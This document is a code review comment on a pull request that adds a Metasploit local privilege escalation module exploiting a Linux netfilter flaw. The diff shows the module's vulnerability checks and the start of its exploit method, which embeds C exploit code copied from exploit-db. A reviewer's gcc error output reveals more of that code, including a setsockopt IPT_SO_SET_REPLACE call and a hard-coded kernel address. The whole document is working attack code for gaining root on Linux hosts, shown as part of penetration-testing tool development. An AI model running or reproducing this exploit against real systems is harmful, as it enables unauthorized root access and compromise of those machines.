modules/exploits/linux/local/netfilter_priv_esc.rb

```diff
@@ -0,0 +1,381 @@
+        else
+          print_error('iptable_raw is not loaded.  root needs to run iptables -L or similar command')
+        end
+        return iptables.include?('iptable_raw')
+      else
+        return false
+      end
+    end
+
+    def libs_installed?()
+      # user@ubuntu:~$ dpkg --get-selections | grep libc6-dev-i386
+      # libc6-dev-i386					install
+      vprint_status('Checking if 32bit C libraries are installed')
+      if target.name == "Ubuntu"
+        lib = cmd_exec('dpkg --get-selections | grep libc6-dev-i386')
+        if lib.include?('install')
+          vprint_good('libc6-dev-i386 is installed')
+        else
+          print_error('libc6-dev-i386 is not installed.  Compiling will fail.')
+        end
+        return lib.include?('install')
+      elsif target.name == "Fedora"
+        lib = cmd_exec('dnf list installed | grep -E \'(glibc-devel.i686|libgcc.i686)\'')
+        if lib.include?('glibc')
+          vprint_good('glibc-devel.i686 is installed')
+        else
+          print_error('glibc-devel.i686 is not installed.  Compiling will fail.')
+        end
+        if lib.include?('libgcc')
+          vprint_good('libgcc.i686 is installed')
+        else
+          print_error('libgcc.i686 is not installed.  Compiling will fail.')
+        end
+        return (lib.include?('glibc') and lib.include?('libgcc'))
+      else
+        return false
+      end
+    end
+
+    def shemsham_installed?()
+      # we want this to be false.
+      vprint_status('Checking if shem or sham are installed')
+      shemsham = cmd_exec('cat /proc/cpuinfo')
+      if shemsham.include?('shem')
+        print_error('shem installed, system not vulnerable.')
+      elsif shemsham.include?('sham')
+        print_error('sham installed, system not vulnerable.')
+      else
+        vprint_good('shem and sham not present.')
+      end
+      return (shemsham.include?('shem') or shemsham.include?('sham'))
+    end
+
+    if libs_installed?() and iptables_loaded?() and not shemsham_installed?()
+      return CheckCode::Appears
+    else
+      return CheckCode::Safe
+    end
+  end
+
+  def exploit
+
+    desc_file = datastore["WritableDir"] + "/" + rand_text_alphanumeric(8)
+    env_ready_file = datastore["WritableDir"] + "/" + rand_text_alphanumeric(8)
+    pwn_file = datastore["WritableDir"] + "/" + rand_text_alphanumeric(8)
+    payload_file = rand_text_alpha(8)
+    payload_path = "#{datastore["WritableDir"]}/#{payload_file}"
+
+    # direct copy of code from exploit-db, except removed the check for shem/sham and ip_tables.ko since we can do that in the check area here
+    decr = %q{
+      #define _GNU_SOURCE
+      #include <stdio.h>
+      #include <stdlib.h>
+      #include <string.h>
+      #include <unistd.h>
+      #include <sched.h>
+      #include <linux/sched.h>
+      #include <errno.h>
+      #include <sys/types.h>
+      #include <sys/socket.h>
+      #include <sys/ptrace.h>
+      #include <netinet/in.h>
```

Comment:
on my ubuntu 16.04.01 w/ the vuln kernel, removing netinet/in.h made the module not compile:
```
[-] gcc failure output: /tmp/FvZPsmHR.c: In function ‘decr’:
/tmp/FvZPsmHR.c:61:11: error: unknown type name ‘uint64_t’
           uint64_t *me = (uint64_t *)(kmatch + 0x58);
           ^
/tmp/FvZPsmHR.c:61:27: error: ‘uint64_t’ undeclared (first use in this function)
           uint64_t *me = (uint64_t *)(kmatch + 0x58);
                           ^
/tmp/FvZPsmHR.c:61:27: note: each undeclared identifier is reported only once for each function it appears in
/tmp/FvZPsmHR.c:61:37: error: expected expression before ‘)’ token
           uint64_t *me = (uint64_t *)(kmatch + 0x58);
                                     ^
/tmp/FvZPsmHR.c:62:17: warning: overflow in implicit constant conversion [-Woverflow]
           *me = 0xffffffff821de10d; // magic number!
                 ^
/tmp/FvZPsmHR.c:64:11: error: unknown type name ‘uint32_t’
           uint32_t *match = (uint32_t *)((char *)&ematch->u.kernel.match + 4);
           ^
/tmp/FvZPsmHR.c:64:30: error: ‘uint32_t’ undeclared (first use in this function)
           uint32_t *match = (uint32_t *)((char *)&ematch->u.kernel.match + 4);
                              ^
/tmp/FvZPsmHR.c:64:40: error: expected expression before ‘)’ token
           uint32_t *match = (uint32_t *)((char *)&ematch->u.kernel.match + 4);
                                        ^
/tmp/FvZPsmHR.c:65:30: error: expected ‘;’ before ‘kmatch’
           *match = (uint32_t)kmatch;
                              ^
/tmp/FvZPsmHR.c:70:21: error: ‘t’ undeclared (first use in this function)
           uint32_t *t = (uint32_t *)target;
                     ^
/tmp/FvZPsmHR.c:70:36: error: expected expression before ‘)’ token
           uint32_t *t = (uint32_t *)target;
                                    ^
/tmp/FvZPsmHR.c:71:26: error: expected ‘;’ before ‘kmatch’
           *t = (uint32_t)kmatch;
                          ^
/tmp/FvZPsmHR.c:77:38: error: ‘SOL_IP’ undeclared (first use in this function)
               ret = setsockopt(sock, SOL_IP, IPT_SO_SET_REPLACE, (void *) data, 66*1024);
                                      ^
```
Added just that line back in and it was good to go